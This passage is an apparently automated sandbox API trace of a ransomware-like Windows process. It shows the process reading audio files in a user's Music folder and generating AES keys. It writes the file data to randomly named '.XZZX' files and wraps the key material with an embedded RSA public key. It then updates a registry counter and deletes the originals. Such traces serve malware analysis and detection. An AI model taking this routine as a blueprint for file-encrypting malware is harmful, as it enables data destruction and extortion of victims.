phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x58c) returned 0x0 [0119.913] RegQueryValueExW (in: hKey=0x58c, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0x7a, lpcbData=0x420dfdc*=0x4) returned 0x0 [0119.913] RegCloseKey (hKey=0x58c) returned 0x0 [0119.913] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x58c) returned 0x0 [0119.913] RegSetValueExW (in: hKey=0x58c, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0x7b, cbData=0x4 | out: lpData=0x420dfec*=0x7b) returned 0x0 [0119.913] RegCloseKey (hKey=0x58c) returned 0x0 [0119.913] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0119.913] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0119.913] CloseHandle (hObject=0x57c) returned 1 [0119.914] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0119.915] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0119.915] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\nvHO8po6UT1lfU646l.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\dqopm\\nvho8po6ut1lfu646l.mp3")) returned 1 [0119.916] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\nvHO8po6UT1lfU646l.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\dqopm\\nvho8po6ut1lfu646l.mp3")) returned 0 Thread: id = 387 os_tid = 0x914 [0119.923] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0119.923] lstrcpyW (in: lpString1=0x420f460, lpString2="oCadhb.wav" | out: lpString1="oCadhb.wav") returned="oCadhb.wav" [0119.923] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0119.923] SetErrorMode (uMode=0x1) returned 0x1 [0119.923] lstrcpyW (in: lpString1=0x420f860, lpString2="oCadhb.wav" | out: lpString1="oCadhb.wav") returned="oCadhb.wav" [0119.923] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x9a8099c8, Data2=0x1ac6, Data3=0x4954, Data4=([0]=0xb9, [1]=0xe, [2]=0x4, [3]=0x6c, [4]=0x28, [5]=0xcc, [6]=0x4e, [7]=0x76))) returned 0x0 [0119.923] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\oCadhb.wav") returned 89 [0119.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0119.923] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\8F1540B007AB3EF89A8099C80BCC2340.XZZX") returned 116 [0119.923] StrStrW (lpFirst="oCadhb.wav", lpSrch="XZZX") returned 0x0 [0119.923] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\oCadhb.wav", dwFileAttributes=0x20) returned 1 [0119.925] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\oCadhb.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\dqopm\\ocadhb.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x580 [0119.925] ReadFile (in: hFile=0x580, lpBuffer=0x3ce16b8, nNumberOfBytesToRead=0x1509d, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x3ce16b8*, lpNumberOfBytesRead=0x420e418*=0x1509d, lpOverlapped=0x0) returned 1 [0119.926] CloseHandle (hObject=0x580) returned 1 [0119.927] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0119.927] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0119.927] SetErrorMode (uMode=0x1) returned 0x1 [0119.928] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0119.928] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc6f60) returned 1 [0119.930] CryptGenKey (in: hProv=0x3cc6f60, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3a5a50) returned 1 [0120.284] CryptExportKey (in: hKey=0x3a5a50, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0120.284] CryptExportKey (in: hKey=0x3a5a50, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x420e41c | out: pbData=0x40e0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0120.284] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0120.285] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0120.285] CryptDestroyKey (hKey=0x3a5a50) returned 1 [0120.285] CryptReleaseContext (hProv=0x3cc6fe8, dwFlags=0x0) returned 0 [0120.285] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\8F1540B007AB3EF89A8099C80BCC2340.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\dqopm\\8f1540b007ab3ef89a8099c80bcc2340.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x590 [0120.286] WriteFile (in: hFile=0x590, lpBuffer=0x3ce16b8*, nNumberOfBytesToWrite=0x1509d, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3ce16b8*, lpNumberOfBytesWritten=0x420e438*=0x1509d, lpOverlapped=0x0) returned 1 [0120.287] SetFilePointer (in: hFile=0x590, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1509d [0120.287] WriteFile (in: hFile=0x590, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0120.287] SetFilePointer (in: hFile=0x590, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x150a2 [0120.288] WriteFile (in: hFile=0x590, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x14, lpOverlapped=0x0) returned 1 [0120.288] SetFilePointer (in: hFile=0x590, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x150b6 [0120.288] WriteFile (in: hFile=0x590, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0120.288] SetFilePointer (in: hFile=0x590, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x150bb [0120.288] SetErrorMode (uMode=0x1) returned 0x1 [0120.288] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0120.288] OutputDebugStringW (lpOutputString="end") [0120.288] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v0\x88Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0120.288] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0120.288] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3cc7070) returned 1 [0120.289] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc7070, dwCertEncodingType=0x1, pInfo=0x3cb15c8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cb15f8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cb1600*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3a5a50) returned 1 [0120.289] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0120.290] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0120.290] CryptEncrypt (in: hKey=0x3a5a50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0120.290] CryptEncrypt (in: hKey=0x3a5a50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc70f8*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc70f8*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0120.290] WriteFile (in: hFile=0x590, lpBuffer=0x3cc70f8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cc70f8*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0120.290] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0120.290] WriteFile (in: hFile=0x590, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0120.290] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0120.290] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0120.290] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x59c) returned 0x0 [0120.290] RegQueryValueExW (in: hKey=0x59c, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0x7b, lpcbData=0x420dfdc*=0x4) returned 0x0 [0120.290] RegCloseKey (hKey=0x59c) returned 0x0 [0120.290] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x59c) returned 0x0 [0120.291] RegSetValueExW (in: hKey=0x59c, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0x7c, cbData=0x4 | out: lpData=0x420dfec*=0x7c) returned 0x0 [0120.291] RegCloseKey (hKey=0x59c) returned 0x0 [0120.291] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.291] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.291] CloseHandle (hObject=0x590) returned 1 [0120.293] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0120.293] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0120.294] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\oCadhb.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\dqopm\\ocadhb.wav")) returned 1 [0120.295] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\oCadhb.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\dqopm\\ocadhb.wav")) returned 0 Thread: id = 388 os_tid = 0x918 [0120.157] lstrcpyA (in: lpString1=0x434fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0120.157] lstrcpyW (in: lpString1=0x434f460, lpString2="qEqtENZ.wav" | out: lpString1="qEqtENZ.wav") returned="qEqtENZ.wav" [0120.157] lstrcpyW (in: lpString1=0x434e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0120.157] SetErrorMode (uMode=0x1) returned 0x1 [0120.157] lstrcpyW (in: lpString1=0x434f860, lpString2="qEqtENZ.wav" | out: lpString1="qEqtENZ.wav") returned="qEqtENZ.wav" [0120.157] CoCreateGuid (in: pguid=0x434e440 | out: pguid=0x434e440*(Data1=0xb6b1d3dd, Data2=0x77b2, Data3=0x4974, Data4=([0]=0x9c, [1]=0x5d, [2]=0xb7, [3]=0x1c, [4]=0x5, [5]=0x4f, [6]=0x97, [7]=0x6b))) returned 0x0 [0120.157] wsprintfW (in: param_1=0x434ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\qEqtENZ.wav") returned 90 [0120.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x434fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0120.157] wsprintfW (in: param_1=0x434e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\B1210AAA2257FEA8B6B1D3DD268CE2F0.XZZX") returned 116 [0120.157] StrStrW (lpFirst="qEqtENZ.wav", lpSrch="XZZX") returned 0x0 [0120.157] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\qEqtENZ.wav", dwFileAttributes=0x20) returned 1 [0120.158] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\qEqtENZ.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\dqopm\\qeqtenz.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x590 [0120.158] ReadFile (in: hFile=0x590, lpBuffer=0x3ccd980, nNumberOfBytesToRead=0x110fd, lpNumberOfBytesRead=0x434e418, lpOverlapped=0x0 | out: lpBuffer=0x3ccd980*, lpNumberOfBytesRead=0x434e418*=0x110fd, lpOverlapped=0x0) returned 1 [0120.159] CloseHandle (hObject=0x590) returned 1 [0120.159] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x40f0000 [0120.160] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4350000 [0120.160] SetErrorMode (uMode=0x1) returned 0x1 [0120.160] lstrcpyW (in: lpString1=0x434e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0120.160] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc6fe8) returned 1 [0120.163] CryptGenKey (in: hProv=0x3cc6fe8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3a5c50) returned 1 [0120.471] CryptExportKey (in: hKey=0x3a5c50, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x434e41c | out: pbData=0x0*, pdwDataLen=0x434e41c*=0x94) returned 1 [0120.471] CryptExportKey (in: hKey=0x3a5c50, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4350000, pdwDataLen=0x434e41c | out: pbData=0x4350000*, pdwDataLen=0x434e41c*=0x94) returned 1 [0120.471] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0120.472] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0120.472] CryptDestroyKey (hKey=0x3a5c50) returned 1 [0120.472] CryptReleaseContext (hProv=0x3cc7180, dwFlags=0x0) returned 0 [0120.472] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\B1210AAA2257FEA8B6B1D3DD268CE2F0.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\dqopm\\b1210aaa2257fea8b6b1d3dd268ce2f0.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58c [0120.473] WriteFile (in: hFile=0x58c, lpBuffer=0x3ccd980*, nNumberOfBytesToWrite=0x110fd, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3ccd980*, lpNumberOfBytesWritten=0x434e438*=0x110fd, lpOverlapped=0x0) returned 1 [0120.474] SetFilePointer (in: hFile=0x58c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x110fd [0120.474] WriteFile (in: hFile=0x58c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0120.474] SetFilePointer (in: hFile=0x58c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x11102 [0120.474] WriteFile (in: hFile=0x58c, lpBuffer=0x434f860*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x434f860*, lpNumberOfBytesWritten=0x434e438*=0x16, lpOverlapped=0x0) returned 1 [0120.475] SetFilePointer (in: hFile=0x58c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x11118 [0120.475] WriteFile (in: hFile=0x58c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0120.475] SetFilePointer (in: hFile=0x58c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1111d [0120.475] SetErrorMode (uMode=0x1) returned 0x1 [0120.475] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0120.475] OutputDebugStringW (lpOutputString="end") [0120.475] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v0\x88Ê\x03`Õ4\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0120.475] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x434dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8 | out: pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8) returned 1 [0120.475] CryptAcquireContextW (in: phProv=0x434d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x434d3e4*=0x3cc7208) returned 1 [0120.476] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc7208, dwCertEncodingType=0x1, pInfo=0x3cb1698*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cb16c8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cb16d0*, PublicKey.cUnusedBits=0x0), phKey=0x434d3ec | out: 